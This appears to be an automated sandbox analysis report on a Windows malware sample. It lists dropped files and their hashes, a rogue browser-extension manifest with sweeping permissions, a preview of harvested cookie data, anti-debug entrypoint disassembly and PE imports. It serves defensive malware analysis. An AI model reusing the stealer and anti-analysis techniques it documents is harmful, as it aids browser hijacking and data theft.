                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\download\zlib1.dll
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):59904
                                                                                                                                                              Entropy (8bit):6.753320551944624
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
                                                                                                                                                              MD5:89F6488524EAA3E5A66C5F34F3B92405
                                                                                                                                                              SHA1:330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
                                                                                                                                                              SHA-256:BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
                                                                                                                                                              SHA-512:CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\ecv37E8.tmp
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1611970727133.exe
                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe7583a04, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):26738688
                                                                                                                                                              Entropy (8bit):0.9544034244886906
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:vlLvaIxfFUziD9gNltkOuvAPIcgooIO3PX2BU:xUz2gNLkOuu
                                                                                                                                                              MD5:6F872A9E59DBDC88C3A7868DADD23D2F
                                                                                                                                                              SHA1:DBEC1F388806EACC0C88F2052BA0A6510B2D22CA
                                                                                                                                                              SHA-256:E1C8F88F32C3E1036ED47A577974FEC63308CCD38059C8FBAC953F687BDF099B
                                                                                                                                                              SHA-512:6342DE3B884FFB7071E41C5B394CEC7FB63071B22102F02E940067F5AEA6019CC4B581730D25B1228B3595549700877FE8B1D86C94A6F2109E3FC0BD194541E8
                                                                                                                                                              Malicious:false
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\gdiview.msi
                                                                                                                                                              Process:C:\Users\user\Desktop\N1yprTBBXs.exe
                                                                                                                                                              File Type:;1033
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):237056
                                                                                                                                                              Entropy (8bit):6.262405449836627
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
                                                                                                                                                              MD5:7CC103F6FD70C6F3A2D2B9FCA0438182
                                                                                                                                                              SHA1:699BD8924A27516B405EA9A686604B53B4E23372
                                                                                                                                                              SHA-256:DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
                                                                                                                                                              SHA-512:92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
                                                                                                                                                              Malicious:false
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\xldl.dat
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:7-zip archive data, version 0.3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1397922
                                                                                                                                                              Entropy (8bit):7.999863097294012
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
                                                                                                                                                              MD5:18C413810B2AC24D83CD1CDCAF49E5E1
                                                                                                                                                              SHA1:ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
                                                                                                                                                              SHA-256:9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
                                                                                                                                                              SHA-512:FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
                                                                                                                                                              Malicious:false
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\xldl.dll
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):293320
                                                                                                                                                              Entropy (8bit):6.347427939821131
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
                                                                                                                                                              MD5:208662418974BCA6FAAB5C0CA6F7DEBF
                                                                                                                                                              SHA1:DB216FC36AB02E0B08BF343539793C96BA393CF1
                                                                                                                                                              SHA-256:A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
                                                                                                                                                              SHA-512:8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              C:\Users\user\AppData\Local\Web Data1611970737586
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):73728
                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                              Malicious:false
                                                                                                                                                              C:\Users\user\AppData\Local\crx.7z
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:7-zip archive data, version 0.3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):36105
                                                                                                                                                              Entropy (8bit):7.994610469125073
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
                                                                                                                                                              MD5:DAFDD7237BA10D0C91295CD1C15749B2
                                                                                                                                                              SHA1:45D55EE145BC71921271BA5493F13D3428589D4D
                                                                                                                                                              SHA-256:B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
                                                                                                                                                              SHA-512:50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
                                                                                                                                                              Malicious:false
                                                                                                                                                              C:\Users\user\AppData\Local\crx.json
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1981
                                                                                                                                                              Entropy (8bit):5.365969892012237
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
                                                                                                                                                              MD5:B5CEED4A6FA3F501787DE10B4CB02EEE
                                                                                                                                                              SHA1:F09C0A8CA18D825D6CE6F192090EBD0659C7321B
                                                                                                                                                              SHA-256:749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
                                                                                                                                                              SHA-512:02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: {"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false
                                                                                                                                                              C:\Users\user\AppData\Localwebdata1611970737633
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):73728
                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                              Malicious:false
                                                                                                                                                              C:\Users\user\AppData\Roaming\1611970727133.exe
                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):103632
                                                                                                                                                              Entropy (8bit):6.404475911013687
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
                                                                                                                                                              MD5:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                              SHA1:B5EE276E8D479C270ECEB497606BD44EE09FF4B8
                                                                                                                                                              SHA-256:6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
                                                                                                                                                              SHA-512:EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 14%
                                                                                                                                                              C:\Users\user\AppData\Roaming\1611970727133.txt
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1611970727133.exe
                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):30168
                                                                                                                                                              Entropy (8bit):3.7189429930762494
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:bYasIDQBc4gYdZ6YEIPmh/gMem6hlkS/V:bYasIDQBRgYdZFEi5MQhlksV
                                                                                                                                                              MD5:D65C5C9854C0BC4ADCEFC8E3A091D20A
                                                                                                                                                              SHA1:F3C57CA5C5B2B94F37D9AE7A9DDA841333C65773
                                                                                                                                                              SHA-256:12F769B6CD58E9B7043A2B1F020CA2D4326F759B0E0911B93EB4E3BD69ABF129
                                                                                                                                                              SHA-512:8EE2ECF4897873FDA30631DFE7D0AA9DE2F46DC16FF3D56295882AA808D13E25F30D3301020D6A6049D07DA6ACA1C2A43EF17413EA5EF85A27DA1A16EEDA53D7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: ..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.1.:.3.6.:.2.2. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.0.6.:.2.3. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.i.c.r.o.s.o.f.t...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".M.S.0.".,.....".V.a.l.u.e.".:.".9.f.5.b.a.a.3.6.e.5.b.8.4.d.0.4.a.0.c.b.3.8.2.b.f.8.3.2.8.c.8.2.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".N.o.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".6.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.8.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.1.:.3.6.:.2.2. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.6./.2.0.2.0. .1.1.:.3.6.:.2.3. .A.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.i.c.r.o.s.o.f.t...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".M.C.1.".,.....".V.a.l.u.e.".:.".G.U.I.D.=.6.1.3.2.9.2.3.c.e.0.7.f.4.d.d.5.9.1.6.c.7.c.5.b.c.1.7.c.e.f.8.9.&.H.A.S.H.=.6.1.

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Entropy (8bit):7.663640140797365
                                                                                                                                                              TrID:
                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                              File name:N1yprTBBXs.exe
                                                                                                                                                              File size:4999496
                                                                                                                                                              MD5:f7d7c89f3f5cbc925480b46b7b934157
                                                                                                                                                              SHA1:73e389b70cf3d8975ccbaf7d04f4c45cc80be860
                                                                                                                                                              SHA256:2870f899f2e9ec540da321f603cfb1a735dcd06df016718e663dc78fefdf5e0a
                                                                                                                                                              SHA512:9b972e2954c18f706a6f8012a6b76e1f4ce8e76466eae919b55a6225c4f8574586d9f11838d8d63bdd245b11cfd3e581248e9a578f72ff2dd8b6623bebc525eb
                                                                                                                                                              SSDEEP:98304:LWrSa24w3rQ/pE/JFBCnpcYiKAEXXPnsNSkUe:iy4wesJFqpc8dXfUSe

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:79f8e470b2f0f083

                                                                                                                                                              Static PE Info

                                                                                                                                                              General

                                                                                                                                                              Entrypoint:0x4efaf0
                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                              Digitally signed:true
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                              Time Stamp:0x53A28C1B [Thu Jun 19 07:07:07 2014 UTC]
                                                                                                                                                              TLS Callbacks:
                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                              OS Version Major:5
                                                                                                                                                              OS Version Minor:1
                                                                                                                                                              File Version Major:5
                                                                                                                                                              File Version Minor:1
                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                              Subsystem Version Minor:1
                                                                                                                                                              Import Hash:580870fafb7ba77509b9cf13d8f3e2af

                                                                                                                                                              Authenticode Signature

                                                                                                                                                              Signature Valid:
                                                                                                                                                              Signature Issuer:
                                                                                                                                                              Signature Validation Error:
                                                                                                                                                              Error Number:
                                                                                                                                                              Not Before, Not After
                                                                                                                                                                Subject Chain
                                                                                                                                                                  Version:
                                                                                                                                                                  Thumbprint MD5:
                                                                                                                                                                  Thumbprint SHA-1:
                                                                                                                                                                  Thumbprint SHA-256:
                                                                                                                                                                  Serial:

                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                  Instruction
                                                                                                                                                                  push ebp
                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                  sub ebp, 18h
                                                                                                                                                                  mov dword ptr [ebp-14h], 004EFAF0h
                                                                                                                                                                  pushfd
                                                                                                                                                                  pushad
                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                  rdtsc
                                                                                                                                                                  mov ecx, eax
                                                                                                                                                                  xor eax, eax
                                                                                                                                                                  rdtsc
                                                                                                                                                                  sub ecx, eax
                                                                                                                                                                  cmp ecx, 00000000h
                                                                                                                                                                  jne 00007F108C9DA6DAh
                                                                                                                                                                  pop eax
                                                                                                                                                                  mov ebx, edi
                                                                                                                                                                  push esi
                                                                                                                                                                  add ebx, eax
                                                                                                                                                                  mov ecx, dword ptr [eax]
                                                                                                                                                                  popad
                                                                                                                                                                  popfd
                                                                                                                                                                  push 00000005h
                                                                                                                                                                  pushfd
                                                                                                                                                                  pushad
                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                  rdtsc
                                                                                                                                                                  mov ecx, eax
                                                                                                                                                                  xor eax, eax
                                                                                                                                                                  rdtsc
                                                                                                                                                                  sub ecx, eax
                                                                                                                                                                  cmp ecx, 00000000h
                                                                                                                                                                  jne 00007F108C9DA6E3h
                                                                                                                                                                  mov edi, ecx
                                                                                                                                                                  ret
                                                                                                                                                                  push edx
                                                                                                                                                                  mov ecx, dword ptr [esi]
                                                                                                                                                                  jmp eax
                                                                                                                                                                  inc ecx
                                                                                                                                                                  mov ebx, dword ptr [ecx]
                                                                                                                                                                  mov ebp, edi
                                                                                                                                                                  mov ebx, esi
                                                                                                                                                                  idiv edx
                                                                                                                                                                  popad
                                                                                                                                                                  popfd
                                                                                                                                                                  mov eax, 004EFE72h
                                                                                                                                                                  pushfd
                                                                                                                                                                  pushad
                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                  rdtsc
                                                                                                                                                                  mov ecx, eax
                                                                                                                                                                  xor eax, eax
                                                                                                                                                                  rdtsc
                                                                                                                                                                  sub ecx, eax
                                                                                                                                                                  cmp ecx, 00000000h
                                                                                                                                                                  jne 00007F108C9DA6E5h
                                                                                                                                                                  mov edi, esp
                                                                                                                                                                  mov ebp, ebx
                                                                                                                                                                  mov ecx, dword ptr [edx]
                                                                                                                                                                  inc edx
                                                                                                                                                                  mov ebx, dword ptr [ebp+00h]
                                                                                                                                                                  mov esp, ebp
                                                                                                                                                                  cmp eax, edx
                                                                                                                                                                  mov ebx, esp
                                                                                                                                                                  mov eax, dword ptr [esp]
                                                                                                                                                                  popad
                                                                                                                                                                  popfd
                                                                                                                                                                  push eax
                                                                                                                                                                  pushfd
                                                                                                                                                                  pushad
                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                  rdtsc
                                                                                                                                                                  mov ecx, eax
                                                                                                                                                                  xor eax, eax
                                                                                                                                                                  rdtsc
                                                                                                                                                                  sub ecx, eax
                                                                                                                                                                  cmp ecx, 00000000h
                                                                                                                                                                  jne 00007F108C9DA6DFh
                                                                                                                                                                  inc edi
                                                                                                                                                                  mov edx, esp
                                                                                                                                                                  mov esp, ebp
                                                                                                                                                                  mov ebx, dword ptr [edi]
                                                                                                                                                                  push edx
                                                                                                                                                                  mov eax, esp
                                                                                                                                                                  inc eax
                                                                                                                                                                  mov ebp, edi
                                                                                                                                                                  popad
                                                                                                                                                                  popfd
                                                                                                                                                                  push 000013C5h
                                                                                                                                                                  pushfd
                                                                                                                                                                  pushad
                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                  rdtsc
                                                                                                                                                                  mov ecx, eax
                                                                                                                                                                  xor eax, eax
                                                                                                                                                                  rdtsc
                                                                                                                                                                  sub ecx, eax
                                                                                                                                                                  cmp ecx, 00000000h
                                                                                                                                                                  jne 00007F108C9DA6DEh
                                                                                                                                                                  dec ebx
                                                                                                                                                                  inc esi
                                                                                                                                                                  idiv ecx
                                                                                                                                                                  mov edi, esp
                                                                                                                                                                  call esi
                                                                                                                                                                  mov edx, esp
                                                                                                                                                                  cmp eax, edx
                                                                                                                                                                  popad

                                                                                                                                                                  Rich Headers

                                                                                                                                                                  Programming Language:
                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                  • [LNK] VS2010 SP1 build 40219
                                                                                                                                                                  • [ASM] VS2010 SP1 build 40219
                                                                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                  • [C++] VS2010 build 30319
                                                                                                                                                                  • [C++] VS2010 SP1 build 40219
                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1565e4 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x162000 | 0xf918 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x18a000 | 0x1948 | .reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x172000 | 0xede4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1217c0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x13fec0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x121000 | 0x63c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x11fc1e | 0x11fe00 | False | 0.463952419399 | data | 6.5610538952 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x121000 | 0x37978 | 0x37a00 | False | 0.340704002809 | data | 5.10261528062 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x159000 | 0x812c | 0x5600 | False | 0.271666061047 | data | 4.93291112706 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x162000 | 0xf918 | 0xfa00 | False | 0.420390625 | data | 5.32227888562 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x172000 | 0x1d332 | 0x1d400 | False | 0.00116018963675 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x162888 | 0xea8 | data | Chinese | China
RT_ICON | 0x163730 | 0x8a8 | data | Chinese | China
RT_ICON | 0x163fd8 | 0x568 | GLS_BINARY_LSB_FIRST | Chinese | China
RT_ICON | 0x164540 | 0x25a8 | data | Chinese | China
RT_ICON | 0x166ae8 | 0x10a8 | data | Chinese | China
RT_ICON | 0x167b90 | 0x468 | GLS_BINARY_LSB_FIRST | Chinese | China
RT_ICON | 0x167ff8 | 0x368 | GLS_BINARY_LSB_FIRST | Chinese | China
RT_ICON | 0x168360 | 0xca8 | data | Chinese | China
RT_ICON | 0x169008 | 0x1ca8 | data | Chinese | China
RT_ICON | 0x16ad38 | 0x668 | data | Chinese | China
RT_ICON | 0x16b3a0 | 0x2e8 | data | Chinese | China
RT_ICON | 0x16b688 | 0x128 | GLS_BINARY_LSB_FIRST | Chinese | China
RT_ICON | 0x16b7b0 | 0xea8 | data | Chinese | China
RT_ICON | 0x16c658 | 0x8a8 | data | Chinese | China
RT_ICON | 0x16cf00 | 0x568 | GLS_BINARY_LSB_FIRST | Chinese | China
RT_ICON | 0x16d468 | 0x25a8 | dBase III DBT, version number 0, next free block index 40 | Chinese | China
RT_ICON | 0x16fa10 | 0x10a8 | data | Chinese | China
RT_ICON | 0x170ab8 | 0x468 | GLS_BINARY_LSB_FIRST | Chinese | China
RT_DIALOG | 0x1625b0 | 0x24c | data | Chinese | China
RT_DIALOG | 0x162800 | 0x86 | data | Chinese | China
RT_STRING | 0x1715c8 | 0xc6 | data | Chinese | China
RT_STRING | 0x171690 | 0x1ba | data | Chinese | China
RT_STRING | 0x171850 | 0xc2 | data | Chinese | China
RT_GROUP_ICON | 0x16acb0 | 0x84 | data | Chinese | China
RT_GROUP_ICON | 0x170f20 | 0x84 | data | Chinese | China
RT_VERSION | 0x170fa8 | 0x2a0 | data | Chinese | China
RT_MANIFEST | 0x171248 | 0x37c | XML 1.0 document, ASCII text | Chinese | China

Imports

DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegQueryValueExW, RegQueryInfoKeyW, RegDeleteKeyW, RegDeleteValueW, RegOpenKeyExW, RegEnumKeyExW, RegCloseKey, RegSetValueExW, GetSidSubAuthority, GetSidSubAuthorityCount, CryptGetHashParam, RegEnumValueW, LookupAccountNameW, CryptHashData, CryptDestroyHash, CryptDestroyKey, CryptCreateHash, CryptImportKey, CryptReleaseContext, CryptVerifySignatureW, CryptAcquireContextW, SetSecurityDescriptorDacl, SetEntriesInAclW, InitializeSecurityDescriptor, CreateWellKnownSid, CopySid, GetLengthSid, ConvertSidToStringSidW, GetSecurityInfo, DuplicateTokenEx, DuplicateToken, CreateRestrictedToken, ConvertStringSidToSidW, SetTokenInformation, CreateProcessAsUserW, SetThreadToken, LookupPrivilegeValueW, RegFlushKey, EqualSid, GetTokenInformation, OpenProcessToken, FreeSid, CheckTokenMembership, AllocateAndInitializeSid, SetSecurityInfo, GetSecurityDescriptorSacl, ConvertStringSecurityDescriptorToSecurityDescriptorW, RegOpenCurrentUser, GetUserNameW
